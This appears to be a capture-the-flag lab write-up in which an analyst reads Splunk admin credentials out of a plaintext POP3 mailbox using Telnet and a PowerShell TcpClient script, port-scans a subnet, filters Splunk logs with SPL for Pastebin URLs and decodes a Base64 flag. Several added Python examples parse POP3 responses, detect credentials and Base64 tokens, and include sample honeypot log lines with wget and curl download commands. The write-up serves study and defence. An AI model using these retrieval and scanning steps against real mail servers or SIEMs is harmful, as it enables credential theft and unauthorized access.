Case 05 Application & Data TDX Arena — IR Expert 08 / 15 / 2025

Mail n' Trail

Honeypot-captured suspicious download activity required pulling administrative Splunk credentials out of an exposed POP3 mail server, pivoting into the SIEM, identifying malicious URLs in the log stream, and decoding a Base64 payload to close the case. Credentials were recovered through two independent methods — a PowerShell TCP client and a Telnet interactive session — to validate the finding by methodological triangulation. Splunk SPL reduced 3,000+ raw events to 56 targeted IOCs. The final Base64 payload decoded to the challenge flag.

Executive Summary

A honeypot named Cowre captured anomalous download activity at a corporate site. The investigation required retrieving Splunk access credentials from a mail server, accessing the Splunk SIEM, identifying malicious URLs in its log stream, and decoding a Base64-encoded message to reveal the final flag.

Two independent methods were used to retrieve the email containing the Splunk credentials: a PowerShell-scripted TCP client that interacted with the POP3 server programmatically, and a Telnet interactive session that spoke POP3 directly. Both methods recovered the same credentials from the same email (message #4), and the redundancy is the point — the finding is defensible because two different tooling paths converged on the identical result.

With the recovered credentials, the Splunk web interface on TCP 8000 granted access to the log stream. Custom SPL queries normalized raw log URLs into a searchable field and filtered the event set from over 3,000 raw events down to 56 targeted Pastebin indicators. One of those URLs contained a Base64 string that decoded to "Congrats, you have finished CIT_FINAL successfully" — the challenge flag. VirusTotal sanity-checks on the Pastebin indicators surfaced a phishing classification on one of the captured URLs.

Findings & Analysis

Exposed POP3 service
TCP 110 on 10.0.111.157
+OK Dovecot (Ubuntu) ready
Unencrypted POP3 reachable over the network. Permitted full plaintext retrieval of emails including credentials in transit. The critical exposure point — any client with network access could read the mailbox.
Credentials in plaintext email
admin / CTF_Final!
(email #4 — "We launched Splunk!")
Splunk administrative credentials stored in the body of a notification email. Recovered via two independent methods (Telnet interactive and PowerShell scripted) to validate the finding by methodological redundancy, not a single lucky retrieval.
Splunk web interface exposed
http://10.0.111.157:8000
(no network restriction)
Splunk Enterprise accessible without IP allowlisting or VPN gating. The recovered credentials granted immediate access to sensitive log data on a service that should have been management-network-only.
SPL event filtering
3,000+ raw events → 56 targeted IOCs
Authored custom SPL with regex URL extraction and Pastebin filtering. Normalized raw log URLs into a searchable url field, then filtered to the Pastebin domain only. The order-of-magnitude reduction is the investigation's analytic product, not an accident.
Pastebin URLs in log stream
/raw/0cs1NHvh
/raw/2QAuwmHe
/raw/ZTWf2ZmP
/raw/C4B5ZK8K
Four distinct Pastebin raw URLs surfaced in the filtered log set. VirusTotal reputation checks ran across all four; 2QAuwmHe returned a phishing classification. The full list is recorded as IOCs for downstream blocklisting.
Base64 payload decoded
Q29uZ3JhdHM…VsbHk= → "Congrats, you have finished CIT_FINAL successfully"
Contents of /raw/0cs1NHvh were Base64-encoded. Decoded in PowerShell to plaintext. Base64 on paste sites is a common tactic to hide payloads and flags; decoding closed the attack chain from exposure through exfiltration.
IOC quick reference
  • Mail server: 10.0.111.157 — TCP 110 (POP3, plaintext)
  • Credentials recovered: admin / CTF_Final! (email #4)
  • Splunk host: 10.0.111.157 — TCP 8000 (no network restriction)
  • Pastebin IOCs: /raw/0cs1NHvh, /raw/2QAuwmHe, /raw/ZTWf2ZmP, /raw/C4B5ZK8K
  • Phishing classification (VT): /raw/2QAuwmHe
  • Decoded flag: "Congrats, you have finished CIT_FINAL successfully"
  • MITRE ATT&CK: T1071.001 (Application Layer Protocol — Web Protocols), T1071.003 (Application Layer Protocol — Mail Protocols)

Tools & Technologies

PowerShell TCP client
System.Net.Sockets.TcpClient used to speak POP3 programmatically when interactive Telnet was unavailable. Scripted, logged, reproducible — the approach of choice when the environment has PowerShell but not Telnet.
Telnet (POP3)
Interactive POP3 session over TCP 110 — USER, PASS, LIST, RETR n, QUIT. The quickest path when Telnet is installed and human-in-the-loop inspection is acceptable. Telnet was not present by default on the Windows Server image; enabled via dism.
Splunk Search Processing Language
Custom SPL authoring with rex field extraction, URL normalization, and domain filtering. The query is the analytic artifact — it's what turned an unreadable log stream into a set of four actionable indicators.
VirusTotal
Multi-engine URL reputation check on the Pastebin indicators captured from Splunk. One of four flagged as phishing — not the one that held the flag payload. Reputation data supplemented the analysis; it did not replace it.
Base64 decode (PowerShell)
Used to decode the payload retrieved from the flag-bearing Pastebin URL. Base64 on paste sites is a common tactic to hide content from casual viewers and simple keyword scans — decoding is part of the closing move.
Web browser (Chrome)
Splunk Web UI access with the recovered credentials, and direct inspection of the Pastebin raw pages that held the Base64 payload.

Method — Dual-Path Validation

Two independent methods recovered the same credentials from the same email. Both are documented in full below. This is not redundancy for its own sake — the value of a credential recovery finding is only as strong as the confidence that the recovery is real, and two different tooling paths converging on the identical result closes the confidence gap that a single successful command leaves open.

Why dual-method

A single successful Telnet session could be environmental luck — wrong account enabled by default, pre-authenticated session, tooling artifact. A single successful PowerShell TCP client could be a quirk of how StreamReader happened to handle the banner response. When both methods return the same credentials on the same message, neither explanation survives. The finding is confirmed by methodological triangulation, not by any one tool. That matters in a report a downstream reviewer will read: it turns an assertion into evidence.

Method A
Telnet — interactive POP3 session

Quickest path when Telnet is installed. Direct, human-readable command exchange over TCP 110. Preferred when interactive inspection of the mailbox is acceptable and a scripted log is not required.

A.01 Verify local IP (result: 10.0.111.156)
ipconfig

Why: The challenge spec placed the mail server at local IP + 1. Confirming the local IPv4 first is what makes the next step's target IP correct rather than guessed.

A.02 Ping the mail server (result: no packet loss)
ping -n 2 10.0.111.157

Why: Route and reachability check before any service-level work. If ping fails, the lab network is misconfigured or the target IP assumption is wrong — catching that now is cheaper than diagnosing it through a failed Telnet.

A.03 Enable Telnet client (result: installed)
dism /online /Enable-Feature /FeatureName:TelnetClient

Why: Telnet ships with Windows Server but is disabled by default. Enabling it through dism avoids the longer Server Manager path and requires admin PowerShell. Documented because downstream reviewers need to know Telnet was not pre-installed.

A.04 Connect to POP3 (result: +OK Dovecot (Ubuntu) ready)
telnet 10.0.111.157 110

Why: POP3 on TCP 110 is plaintext and accepts simple line-based commands. The +OK Dovecot banner confirms the service is running and identifies the server software — useful context if something downstream behaves unexpectedly.

A.05 Authenticate and list messages (result: 4 messages)
USER johnd
PASS toor
LIST

Why: Standard POP3 authentication followed by LIST to enumerate mailbox contents. Four messages returned, sized 1117 / 1361 / 1210 / 869 bytes.

A.06 Retrieve and inspect each email (result: email #4 holds credentials)
RETR 1
RETR 2
RETR 3
RETR 4

Why: Fetch each message in sequence and inspect content for credential-like material. Emails #1–#3 were operational notifications (maintenance, monitoring, software update). Email #4 — subject "We launched Splunk!" — contained username: admin and password: CTF_Final! in plaintext, along with the Splunk URL http://[SERVER-IP]:8000/.

A.07 Access Splunk with recovered credentials (result: dashboard reached)
Browser → http://10.0.111.157:8000
Login: admin / CTF_Final!

Why: Direct validation of the recovered credentials against the target service. Successful login confirms the email contents were not stale — these are live administrative credentials on an exposed Splunk instance.

A.08 Author SPL to filter 3,000+ events to Pastebin URLs (result: 56 events)
index=* ("http://" OR "https://")
| rex field=_raw "(?i)(?<url>https?://[^\s\"']+)"
| search url="*pastebin.com*"
| table _time url
| sort -_time

Why: index=* with a URL-substring filter catches any event that mentions a URL or download command. rex extracts those URLs into a named url field so they can be ranked and filtered. Narrowing to *pastebin.com* drops the noise — the reduction from 3,000+ raw events to 56 Pastebin-specific events is the analytic product of the search, and the path that got there is visible in the query itself.

A.09 Reputation sanity-check via VirusTotal (result: one phishing classification)
# Each URL submitted to VirusTotal:
https://pastebin.com/raw/0cs1NHvh
https://pastebin.com/raw/2QAuwmHe    ← phishing (VT)
https://pastebin.com/raw/ZTWf2ZmP
https://pastebin.com/raw/C4B5ZK8K

Why: Independent reputation signal on every captured URL. VirusTotal flagged 2QAuwmHe as phishing; the remaining three were not flagged by any engine. The phishing classification was not on the flag-bearing URL, which underlines the point — reputation data complements analysis, it does not replace it.

A.10 Decode the Base64 payload (result: flag recovered)
# Retrieved from https://pastebin.com/raw/0cs1NHvh:
Q29uZ3JhdHMsIHlvdSBoYXZlIGZpbmlzaGVkIENJVF9GSU5BTCBzdWNjZXNzZnVsbHk=
# Decoded: "Congrats, you have finished CIT_FINAL successfully"

Why: Base64 on paste sites is a standard payload-hiding technique. Decoding is the closing move on the attack chain — from exposure (open POP3) through credential recovery, SIEM pivot, IOC isolation, and finally the hidden content itself.

Method B
PowerShell — scripted POP3 via TcpClient

Used when Telnet is not installed or when a scripted, logged, reproducible trace is required. Interacts with the POP3 service at the socket level through System.Net.Sockets.TcpClient.

B.01 Confirm local IP (result: 10.0.90.252)
ipconfig

Why: Same rationale as Method A — the target IP is derived from the local IP. Different lab session, different IPs; same protocol.

B.02 Ping mail server (result: reachable)
ping -n 2 10.0.90.253

Why: Reachability check before service-level work.

B.03 Enumerate open mail ports (result: 110 open)
$ports = 22,110,143,993,995,25,587
foreach ($p in $ports) {
    Test-NetConnection 10.0.90.253 -Port $p |
        Select-Object ComputerName, RemotePort, TcpTestSucceeded
}

Why: Enumerate the common mail and shell ports in one loop to establish the attack surface before committing to an approach. POP3 (110) confirmed open; SMTP (25) and POP3S (995) also responded; IMAP (143, 993) closed. Choice of POP3 over IMAP is dictated by what's actually open.

B.04 Open POP3 session over TcpClient (result: banner received)
$tcp    = New-Object System.Net.Sockets.TcpClient("10.0.90.253", 110)
$stream = $tcp.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$reader = New-Object System.IO.StreamReader($stream)
$reader.ReadLine()                                                  # +OK Dovecot (Ubuntu) ready
$writer.WriteLine("USER johnd"); $writer.Flush(); $reader.ReadLine()  # +OK
$writer.WriteLine("PASS toor");  $writer.Flush(); $reader.ReadLine()  # +OK Logged in.
$writer.WriteLine("LIST");       $writer.Flush()
# LIST is a multi-line response: read until the bare "." terminator.
# ReadToEnd() would block here, because the server keeps the socket open after the listing.
while (($l = $reader.ReadLine()) -ne ".") { $l }

Why: TcpClient speaks raw TCP, which is all POP3 is. StreamWriter.Flush() on every line matters — without it, PowerShell's buffering silently holds commands and the server receives nothing. ReadLine() after each write synchronizes on the server response. Explicit, scripted, and reproducible — the exact opposite of Telnet's interactive convenience.

B.05 Retrieve message #4 — recover credentials (result: admin / CTF_Final!)
$writer.WriteLine("RETR 4"); $writer.Flush()
while (($l = $reader.ReadLine()) -ne ".") { $l | Out-Host }       # multi-line response ends at a bare "."
$writer.WriteLine("QUIT"); $writer.Flush(); $reader.ReadLine()    # +OK Logging out.
$tcp.Close()

Why: POP3 terminates a multi-line response with a bare period on its own line. Reading until . is the correct termination — reading a fixed byte count would truncate, and reading to end-of-stream would hang waiting for the server to close the socket. Same credentials surfaced as Method A: admin / CTF_Final!. The dual-path validation is complete.
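The multi-line framing that B.05 relies on, and the credential-spotting that A.06 did by eye, as an added example (not the page's own PowerShell, and not run against the lab): a Python parser for POP3 multi-line responses with RFC 1939 dot-stuffing handled, fed a constructed RETR transcript modelled on email #4, plus a small pattern check that flags credential-looking lines the way a mailbox audit would. The transcript, the sender address and the CRED_PATTERNS list are constructed for this example.

```python
import re

# Constructed POP3 server transcript for a RETR response, modelled on email #4
# (not captured from the lab). RFC 1939 framing: a multi-line response ends with
# a line holding a single ".", and any body line that itself begins with "." is
# sent with an extra "." in front (byte-stuffing) that the client must strip.
RETR_RESPONSE = (
    "+OK 869 octets\r\n"
    "From: it-ops@example.test\r\n"
    "Subject: We launched Splunk!\r\n"
    "\r\n"
    "Hi team,\r\n"
    "The SIEM is live at http://[SERVER-IP]:8000/\r\n"
    "username: admin\r\n"
    "password: CTF_Final!\r\n"
    "..and yes, this line really starts with a dot.\r\n"   # stuffed on the wire
    ".\r\n"                                               # terminator
)


class Pop3Error(Exception):
    """Raised for a -ERR status or a response whose terminator never arrives."""


def parse_multiline(raw: str) -> list[str]:
    """Parse a POP3 multi-line response (RETR, LIST, TOP) into its body lines."""
    lines = raw.split("\r\n")
    status = lines[0]
    if not status.startswith("+OK"):
        raise Pop3Error(f"server refused the command: {status}")
    body: list[str] = []
    for line in lines[1:]:
        if line == ".":          # bare period on its own line: end of response
            return body
        if line.startswith("."):
            line = line[1:]      # undo byte-stuffing
        body.append(line)
    # A fixed-size or timed-out read lands here: the message was cut short.
    raise Pop3Error("response truncated: terminator line never arrived")


def is_complete(raw: str) -> bool:
    """True when the buffer holds a whole, well-formed multi-line response."""
    try:
        parse_multiline(raw)
        return True
    except Pop3Error:
        return False


# Constructed patterns a mailbox audit would flag: key/value pairs naming a
# user or a password. Extend for the vocabulary of the environment being audited.
CRED_PATTERNS = [
    re.compile(r"(?i)\b(user(?:name)?|login)\s*[:=]\s*(\S+)"),
    re.compile(r"(?i)\b(pass(?:word|wd)?)\s*[:=]\s*(\S+)"),
]


def find_credentials(body: list[str]) -> dict[str, str]:
    """Return {label: value} for credential-looking lines in a message body."""
    hits: dict[str, str] = {}
    for line in body:
        for pat in CRED_PATTERNS:
            m = pat.search(line)
            if m:
                hits[m.group(1).lower()] = m.group(2)
    return hits


if __name__ == "__main__":
    body = parse_multiline(RETR_RESPONSE)
    print("\n".join(body))
    print(find_credentials(body))
```

The parser is deliberately strict: a buffer with no terminator raises instead of returning a partial body, which is the failure mode the page warns about when reading a fixed byte count. Run over a real mailbox export, find_credentials gives a defender the same list an attacker would get from the exposed service, which is the list of credentials to rotate.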

B.06 Scan subnet for Splunk (result: 10.0.90.253:8000)
241..254 | ForEach-Object {
    $ip = "10.0.90.$_"
    if ((Test-NetConnection $ip -Port 8000 -WarningAction SilentlyContinue).TcpTestSucceeded) {
        Write-Host "Splunk found at $ip"
    }
}

Why: In this lab session, the Splunk host's exact IP wasn't stated up front — only that it was in the subnet. Port-8000 sweep across the relevant range locates it without requiring DNS or broadcast reconnaissance. -WarningAction SilentlyContinue suppresses the noise from each failed connection attempt.

B.07 Authenticate, author SPL, close the chain (result: flag recovered)
# Login: admin / CTF_Final! at http://10.0.90.253:8000
# SPL (same pattern as Method A):
index=* ("http://" OR "https://")
| rex field=_raw "(?i)(?<url>https?://[^\s\"']+)"
| stats count by url
| sort -count

Why: The SPL pattern is stable across both methods. Minor variation — stats count by url instead of table — gives a ranked indicator list rather than a time-ordered stream, useful when prioritizing for blocklisting. Decoded the same Base64 payload from /raw/0cs1NHvh to recover the identical flag. Chain closed independently of Method A.

Recommendations

Close unencrypted mail services at the network edge
POP3 on TCP 110 transmits credentials and message bodies in plaintext. Where POP3 is required, it should be tunneled through TLS (POP3S on 995) or restricted to management networks via firewall rule. The specific exposure in this case — administrative credentials readable by any host with network access — is entirely eliminated by either control.
Never transmit credentials in email bodies
Credentials delivered by email persist in the mailbox, in backups, in mail-archive systems, and in every client that has synced the account. Rotate any credentials that may have been delivered this way, and replace the operational pattern with an out-of-band channel (password manager share, one-time credential delivery, identity-provider-initiated onboarding).
Network-restrict SIEM and management interfaces
Splunk Web on TCP 8000 reached from any host on the network is the second half of the failure chain in this case. SIEM web interfaces belong on management networks, behind VPN, or behind an identity-aware proxy. MFA on the Splunk admin account is a necessary complement, not a substitute.
Operationalize Base64 and encoding detection in SPL
The Base64 payload in this case was the final concealment step. SPL queries that flag high-entropy strings, Base64-shaped patterns, or common encoding markers in log fields turn that concealment into a detection. Automate the pattern, alert on it, and correlate with outbound traffic to paste-site domains.
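The detection this recommendation describes, and the decode in A.10, as an added example in Python rather than SPL (not from the page; the log lines are constructed for it): find Base64-shaped tokens in log text, gate on Shannon entropy so padding runs drop out, and attempt a strict decode so the analyst sees immediately whether the token hides readable text. It generalizes the page's single decode to a scan over many lines; the entropy floor of 3.5 is an assumed starting value, not a tuned threshold.

```python
import base64
import binascii
import math
import re
from collections import Counter

# Constructed log lines (not from the case's Splunk data). The first carries the
# page's Base64 string; the third carries a token that decodes to non-text bytes;
# the fourth is a long but low-entropy run that a shape regex alone would flag.
SAMPLE_LINES = [
    "cowrie.command.input cmd=echo Q29uZ3JhdHMsIHlvdSBoYXZlIGZpbmlzaGVkIENJVF9GSU5BTCBzdWNjZXNzZnVsbHk= | base64 -d",
    "sshd: Accepted password for root from 203.0.113.5 port 51234",
    "cowrie.command.input cmd=echo AAECAwQFBgcICQoLDA0ODw== | base64 -d > /tmp/blob",
    "cowrie.session.params padding=AAAAAAAAAAAAAAAAAAAAAAAA",
]

# Base64-shaped run: 20 or more alphabet characters, optional "=" padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def shannon_entropy(s: str) -> float:
    """Bits per character: a 64-symbol alphabet tops out at 6, repeated characters sit near 0."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decode_if_text(token: str):
    """Strict decode; return the plaintext only if every character is printable, else None."""
    padded = token + "=" * (-len(token) % 4)      # restore padding a log line may have stripped
    try:
        data = base64.b64decode(padded, validate=True)
        text = data.decode("utf-8")
    except (binascii.Error, ValueError):          # UnicodeDecodeError is a ValueError
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def scan(lines, min_entropy: float = 3.5):
    """Flag Base64-shaped tokens whose entropy clears the floor and try to decode each.

    The entropy floor (assumed value) drops padding runs and repeated characters;
    the decode tells the analyst whether the token hides text (a command, a URL,
    a flag) or binary that needs a different look.
    """
    findings = []
    for line in lines:
        for m in B64_TOKEN.finditer(line):
            token = m.group(0)
            ent = shannon_entropy(token)
            if ent < min_entropy:
                continue
            findings.append({"token": token, "entropy": round(ent, 2), "decoded": decode_if_text(token)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f["entropy"], f["token"][:24] + "...", "->", f["decoded"])
```

Short tokens cap out at lower entropy (a 24-character token cannot reach 6 bits), so the floor should be set from the token lengths the environment actually produces; the same logic ports to SPL as a rex for the token shape followed by an eval-based length or character-class check, with the decode left to the analyst.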
Use multiple methods when the finding must be defensible
For findings that will be cited in a report or inform downstream action, recovering the same result through two independent tooling paths is not extra work — it is the difference between assertion and evidence. The dual-method approach used here (Telnet + PowerShell TCP client) is a pattern that generalizes to any recovery operation where confidence in the result matters.

Technical Note

SPL as the analytic artifact

The investigation's central analytic move is the reduction from 3,000+ raw events to 56 Pastebin-specific events. That reduction is the SPL query itself. It's not a filter applied to a display — it is the data transformation that produced the finding. Two components do the work: a rex extraction that lifts URLs out of unstructured _raw into a named field, and a wildcard search that narrows by domain. Neither is sophisticated individually. Together they are the difference between an unreadable log stream and a list of four IOCs ready for downstream action.

The query generalizes. Any investigation involving URLs embedded in log text can apply the same pattern: regex-extract into a named field, filter by the domain class of interest, surface what's left. Downstream investigators reading the SPL should be able to retarget it to a different domain or indicator class with a single-line change. That portability is part of what SPL authoring — as distinct from SPL running — actually produces.
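The rex/search/stats pipeline from A.08 and B.07, and the retargeting this section describes, rebuilt as an offline Python stand-in (added example, not the page's SPL, and not run against the case's Splunk): the same URL regex, the wildcard domain filter, the time-ordered table and the ranked count, over a constructed set of Cowrie-style events. It goes one step past the page by adding a hostname-exact filter, since `*pastebin.com*` also matches lookalike hosts; the event lines and the pastebin.com.evil.test host are constructed.

```python
import fnmatch
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample of (_time, _raw) events in a Cowrie-like format. None of these
# lines come from the Splunk instance in the case; the lookalike host on the sixth
# line is there to show where a wildcard domain filter overmatches.
RAW_EVENTS = [
    ("2025-08-15T10:01:02", "cowrie.command.input cmd=wget https://pastebin.com/raw/0cs1NHvh -O /tmp/x"),
    ("2025-08-15T10:01:05", "cowrie.command.input cmd=curl -s 'https://pastebin.com/raw/2QAuwmHe'"),
    ("2025-08-15T10:02:11", "sshd: Accepted password for root from 203.0.113.5 port 51234"),
    ("2025-08-15T10:03:40", 'GET http://updates.example.test/patch.bin HTTP/1.1 "Mozilla/5.0"'),
    ("2025-08-15T10:04:02", "cowrie.command.input cmd=wget https://pastebin.com/raw/0cs1NHvh"),
    ("2025-08-15T10:04:30", "cowrie.command.input cmd=curl https://pastebin.com.evil.test/raw/abc"),
    ("2025-08-15T10:05:19", "cowrie.session.closed duration=43"),
]

# Same pattern as the page's rex; SPL's PCRE-style (?<url>...) is (?P<url>...) in Python's re.
URL_RE = re.compile(r"(?i)(?P<url>https?://[^\s\"']+)")


def rex_url(events):
    """Stand-in for `rex field=_raw ...`: attach a url field where the regex matches.
    Events with no URL get no field and therefore fall out at the next search step."""
    extracted = []
    for ts, raw in events:
        m = URL_RE.search(raw)
        if m:
            extracted.append({"_time": ts, "url": m.group("url"), "_raw": raw})
    return extracted


def search_wildcard(events, pattern):
    """Stand-in for `search url="*pastebin.com*"`: shell-style wildcard over the url field."""
    return [e for e in events if fnmatch.fnmatchcase(e["url"].lower(), pattern.lower())]


def search_host(events, domain):
    """Stricter alternative: compare the parsed hostname (or a subdomain of it), so
    pastebin.com.evil.test does not match pastebin.com the way the wildcard does."""
    domain = domain.lower()
    keep = []
    for e in events:
        host = (urlparse(e["url"]).hostname or "").lower()
        if host == domain or host.endswith("." + domain):
            keep.append(e)
    return keep


def table_by_time(events):
    """Stand-in for `table _time url | sort -_time`: newest first."""
    return sorted(((e["_time"], e["url"]) for e in events), key=lambda r: r[0], reverse=True)


def stats_count_by_url(events):
    """Stand-in for `stats count by url | sort -count`: ranked indicator list."""
    return Counter(e["url"] for e in events).most_common()


if __name__ == "__main__":
    with_url = rex_url(RAW_EVENTS)
    print(f"{len(RAW_EVENTS)} raw events -> {len(with_url)} with a url field")
    hits = search_host(with_url, "pastebin.com")
    for row in table_by_time(hits):
        print(*row)
    for url, n in stats_count_by_url(hits):
        print(n, url)
```

Retargeting is the one-line change the section describes: swap the domain argument, or the regex, and the rest of the pipeline stands. The hostname-exact variant is worth carrying into the SPL as well (a rex for the host followed by an exact match) whenever the indicator list feeds a blocklist, because a wildcard that sweeps in lookalike hosts will block the wrong thing.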

Methodological redundancy with Telnet and PowerShell served a different purpose: defending the credential recovery against the possibility of tooling artifact. Both are characteristic of the case type. One investigation asked "what are the indicators?" and answered through SPL. A parallel part of the same investigation asked "are these really the credentials?" and answered through independent re-derivation. Both questions got explicit, documented answers.

References

  1. MITRE ATT&CK — Application Layer Protocol. T1071.001 (Web Protocols) and T1071.003 (Mail Protocols) map to the Pastebin command-and-control pattern and the POP3 credential exfiltration surface observed in this case. attack.mitre.org/techniques/T1071
  2. Splunk Search Reference. Official SPL documentation for rex, search, and stats — the core commands used to author the filter that produced the IOC list. docs.splunk.com
  3. VirusTotal. Multi-engine URL reputation source used to supplement the Splunk-derived IOCs. virustotal.com
  4. Microsoft — POP3 Protocol reference. Canonical reference for POP3 commands (USER, PASS, LIST, RETR, QUIT) and response framing, including the multi-line dot-terminator used in RETR responses. learn.microsoft.com